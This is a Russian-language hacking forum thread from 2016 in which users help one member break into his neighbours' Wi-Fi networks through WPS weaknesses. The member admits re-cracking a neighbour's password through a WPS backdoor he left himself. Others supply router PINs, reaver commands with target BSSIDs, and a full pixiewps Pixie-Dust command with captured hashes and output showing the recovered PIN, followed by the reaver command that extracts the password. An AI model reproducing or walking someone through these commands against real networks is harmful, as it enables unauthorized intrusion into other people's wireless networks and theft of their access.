Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    кстати,кто пробовал в pixiewps поставить ключ -P .насобирать десяток разных хешей и потом их прогнать?просто неудобно эти хешы подставлять,долго......может автоматическое что то уже есть,не?
     
  2. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,135
    Likes Received:
    1,931
    Reputations:
    24
    Еще нету, да и никто им не занимается, по крайней мере не слышал ничего об этом.
     
    4Fun likes this.
  3. tihan2007

    tihan2007 Member

    Joined:
    2 Oct 2015
    Messages:
    107
    Likes Received:
    7
    Reputations:
    0
    Доброе время суток, прошу помощи, интересует WPS PIN для роутера TOTOLINK N300RT 78:44:76:A3:96:3C. Был использован 07208287 | 24-bit PIN и pixiewps результат нулевой, какие еще возможны варианты?
     
  4. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    И неудивительно, потому что вы не воспользовались генератором WPS PIN на сайте 3WiFi.

    Пробуйте 01042702 и 99956042.
     
    4Fun and tihan2007 like this.
  5. tihan2007

    tihan2007 Member

    Joined:
    2 Oct 2015
    Messages:
    107
    Likes Received:
    7
    Reputations:
    0
    Им и пользовался, только не те пины это понятно 99956042 | Static PIN - Onlime, а этого нет в Оффлайн генераторе 01042702? P.S.: понял 01042702 это Static PIN 01042702 90%
     
    #3705 tihan2007, 23 Dec 2016
    Last edited: 23 Dec 2016
  6. x10

    x10 Well-Known Member

    Joined:
    12 Oct 2016
    Messages:
    306
    Likes Received:
    1,246
    Reputations:
    1
    Доброй ночи, господа!
    Немного предыстории ) началось все с того что соседи сменили пороль от вай фая. Проблем особых не составило взломать их повторно, благо лазейку я себе оставил включив WPS. (благо не шарят). Что их понудило на это... пользовался ихней сетью в исключительно редких случаях.
    Ну ладно поехали дальше... Наткнулся я на очередного соседа с вкл WPS, роутер MGTS_GPON **** о думаю счастье привалило как бы не так, столкнулся с проблемой
    Меня смущает:
    [+] Trying pin 88885674.
    [+] 0.09% complete.
    гонял около 2 часов процесс и пин стоит на месте
    Сильно не ругайте я зеленый еще! скопировал минимум .
    подрузамеваю что роутер залочен как разлочить неужели рубильник ) ?
    Еще вопрос можно ли хеншейк прогнать по словарю на пин, а пин прогнать через ривер) ?
     
    #3706 x10, 24 Dec 2016
    Last edited: 24 Dec 2016
  7. x10

    x10 Well-Known Member

    Joined:
    12 Oct 2016
    Messages:
    306
    Likes Received:
    1,246
    Reputations:
    1
    К дополнению, потестил на своем роутере MGTS_GPON **** интсрумент mdk3, к сожалению нужно находиться в непосредственной близостик к роутеру из за слабого сигнала карточки в ноутбуке мощность которую повысить нельзя( обидно .
    После ручного ребута роутера, попрежнему дается только 10 попыток подбора пина! помогите) я так близко)
     
  8. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Так и есть. И при таком раскладе pixiewps не сможет получить все нужные данные.
    Именно.
    Можно, в теме словарей был словарь всех возможных WPS PIN кодов. Только у MGTS GPON таких паролей обычно не водится, вот TP-LINK таким словарём есть смысл прогонять.
    Если пароль будет найден, уже нет смысла прогонять пин.
    Внешние адаптеры с антеннами наше всё.
     
    Triton_Mgn and Payer like this.
  9. x10

    x10 Well-Known Member

    Joined:
    12 Oct 2016
    Messages:
    306
    Likes Received:
    1,246
    Reputations:
    1
    СПУСТИл НА ЗЕМЛЮ(
    А с этим то как быть, После ручного ребута роутера, попрежнему дается только 10 попыток подбора пина! неужели постоянно ребут,получается взлом гадского мгтс становится невыпонимым!?
     
    #3709 x10, 24 Dec 2016
    Last edited: 24 Dec 2016
  10. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Если pixiewps не находит пин код сразу, то:
    1. Попробовать ещё пару раз
    2. Подбирать все возможные пины, периодически перезагружая девайс (но это геморрой)
    3. Словить хендшейк, скинуть в тему подбора
    Тогда бы все уже давно так делали. Pixiewps в общем-то это и делает, но такое возможно только при некачественном рандоме при генерации хешей, а это уязвимость.
     
  11. x10

    x10 Well-Known Member

    Joined:
    12 Oct 2016
    Messages:
    306
    Likes Received:
    1,246
    Reputations:
    1
    Pixiewps не пробывал. надо на своем роутере по эксперементировать токо разобратся с прогой надо....
     
  12. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Пробовали, у вас в команде "-K 1" у reaver. Но видимо до роутера не доходило.

    И только сейчас заметил, зачем у вас флаг "-a"? Вы ассоциацию с точкой вручную проводите? Или откуда-то копируете команды без понимания?
     
  13. x10

    x10 Well-Known Member

    Joined:
    12 Oct 2016
    Messages:
    306
    Likes Received:
    1,246
    Reputations:
    1
    как я понял это команда отвечает за автоопределение лучшего перебора вот и поставил)
     
  14. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Так я и думал.

    В общем, пробуйте вот так (когда точка разлочится):
    reaver -i wlan0mon -c # -b 94:4A:0C:40:40:9D -vv -K 1

    И номер канала точки укажите вместо решётки.
     
  15. x10

    x10 Well-Known Member

    Joined:
    12 Oct 2016
    Messages:
    306
    Likes Received:
    1,246
    Reputations:
    1
    jr
    ок сейчас попробую отпишу. пока эксперементию на своей точке с ребутом проблем нет все упирается в количество попыток , а их всего 10(

    Я ПРАВИЛЬНО ПОНИМАЮ PIXIEWPS -K 1 не поможет уязвимости нет!?
    Попробывал еще так :
    [/quote]
     
    #3715 x10, 24 Dec 2016
    Last edited: 24 Dec 2016
  16. x10

    x10 Well-Known Member

    Joined:
    12 Oct 2016
    Messages:
    306
    Likes Received:
    1,246
    Reputations:
    1
    Если как то поможет могу системны журнал с роутера скинуть.
     
  17. Sves

    Sves Active Member

    Joined:
    7 Dec 2015
    Messages:
    33
    Likes Received:
    186
    Reputations:
    1
    Этот роутер уязвим к атаке "Pixie-Dust". Полученных данных достаточно для получения корректного ПИНа, надо вручную запустить pixiewps с параметром -f (full PRNG brute force):
    Code:
    root@linux:~$ pixiewps -f -e c6:dd:34:30:b5:83:e8:59:9b:a8:aa:45:f0:42:8a:6d:21:e7:d1:e9:65:33:4b:b0:9e:98:7c:ff:67:36:d6:4b:09:06:b7:48:8f:80:48:01:b7:7c:a1:57:89:21:d4:a9:58:af:ce:34:4c:38:4c:4f:78:9e:6a:f4:17:1e:c1:b0:0a:3d:44:e5:a7:54:f0:e6:b4:42:58:eb:a0:cb:9d:64:53:01:fd:20:70:1a:ff:2f:58:8e:62:79:f6:95:e5:3c:28:19:e6:15:86:50:4e:91:15:2b:47:83:f9:b4:48:4c:67:d7:b2:90:df:20:e3:07:fc:83:53:29:4d:f4:36:6b:4d:68:a5:3a:ae:d5:f9:a5:57:18:a5:7b:e6:23:8d:f3:af:f7:c2:ff:15:ed:9d:76:aa:e7:76:cc:3c:85:dc:47:b6:09:7b:e3:7d:8f:d9:b0:dd:f1:36:df:dd:b4:ce:d4:c0:bc:39:b7:22:9b:cb:d2:79:40:66:98:72:95:32:b6 -r c5:14:14:4f:e1:df:0b:1c:e1:49:a3:22:ad:8f:88:64:7a:73:0b:05:59:c0:a7:ee:10:9c:d3:9c:93:6b:73:42:e1:50:93:4e:1f:f3:15:8c:13:58:02:72:9d:c1:3b:45:82:44:7b:0e:59:28:50:34:bd:12:e3:5f:ba:a5:34:57:b5:49:9b:c4:08:09:ab:29:11:81:0e:cb:55:8e:82:ab:fe:26:4b:88:aa:4e:67:24:fc:4b:ae:f0:87:4a:87:b8:db:1c:a4:d4:a3:c6:91:d2:0c:c6:22:9e:d2:7b:1b:97:1f:dc:88:0b:71:3c:d9:c5:67:fd:59:b6:cd:fc:4a:a9:80:8d:56:d6:1e:c0:d4:36:dd:c1:a7:52:60:17:f4:8d:49:cb:28:5d:4b:b8:46:59:4e:af:3d:09:c3:ae:c4:bb:69:70:f3:7f:5b:cc:f5:2b:8b:09:dd:30:7c:5a:21:f7:54:72:63:40:f4:57:98:d1:a6:f1:4f:01:cd:4b:75:d8 -s 9e:c6:5c:68:11:24:dc:f0:79:12:ca:10:17:5d:93:f8:12:41:74:ba:23:e8:49:95:67:26:1b:16:aa:69:51:92 -z 9c:d6:82:f1:3a:32:e8:1b:e3:9d:28:bb:08:db:85:ee:83:a0:bf:b7:ed:10:98:69:6b:6e:b4:64:02:78:19:68 -a 79:d6:07:86:98:84:51:82:2a:db:3f:5f:3b:e5:39:1a:32:65:c0:28:a2:e5:90:31:fc:43:65:5d:c4:ce:20:ca -n 41:5a:94:dc:43:2e:de:0d:31:fb:c1:53:59:47:2a:ac
    
    Pixiewps 1.2
    
    [*] PRNG Seed:  1482612324 (Sat Dec 24 20:45:24 2016 UTC)
    [*] Mode:  3 (RTL819x)
    [*] PSK1:  e6:b3:49:20:6e:d2:67:f2:7c:1d:87:83:1c:8d:a9:9e
    [*] PSK2:  70:3c:c5:ef:02:d0:15:1d:46:d7:07:4f:ae:1a:a0:8e
    [*] E-S1:  6f:85:64:b9:38:17:11:f0:58:e3:95:5d:02:9c:a3:d0
    [*] E-S2:  6f:85:64:b9:38:17:11:f0:58:e3:95:5d:02:9c:a3:d0
    [+] WPS pin:  21459221
    
    [*] Time taken: 0 s 122 ms
    А далее запустить:
    reaver -i wlan0mon -b D4:21:22:FF:27:76 -vv -p 21459221
    для получения пароля.

    Обнови pixiewps.
     
    #3717 Sves, 24 Dec 2016
    Last edited: 24 Dec 2016
    Payer, Triton_Mgn and binarymaster like this.
  18. x10

    x10 Well-Known Member

    Joined:
    12 Oct 2016
    Messages:
    306
    Likes Received:
    1,246
    Reputations:
    1
    ВАУ ТЫ ГЕНИЙ))) ! ПИН ТАКОЙЖЕ КАК И В НАСТРОЙКАХ РОУТЕРА КРУТЯК! держись МГТС Я ИДУ ЗА ТОБОЙ) Спасибо тебе за новодку я не знал что существуют модификации, всегда обновляюсь.Кстати после обновления Pixiewps почему в аргументах нету инфы по этому инструменту -f
     
    #3718 x10, 24 Dec 2016
    Last edited: 25 Dec 2016
    4Fun, Triton_Mgn and binarymaster like this.
  19. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Не забудьте пополнить базу 3WiFi, посканировав его Router Scan'ом. ;)
     
    4Fun likes this.
  20. x10

    x10 Well-Known Member

    Joined:
    12 Oct 2016
    Messages:
    306
    Likes Received:
    1,246
    Reputations:
    1
    ок сделаю! только до щитка доберусь)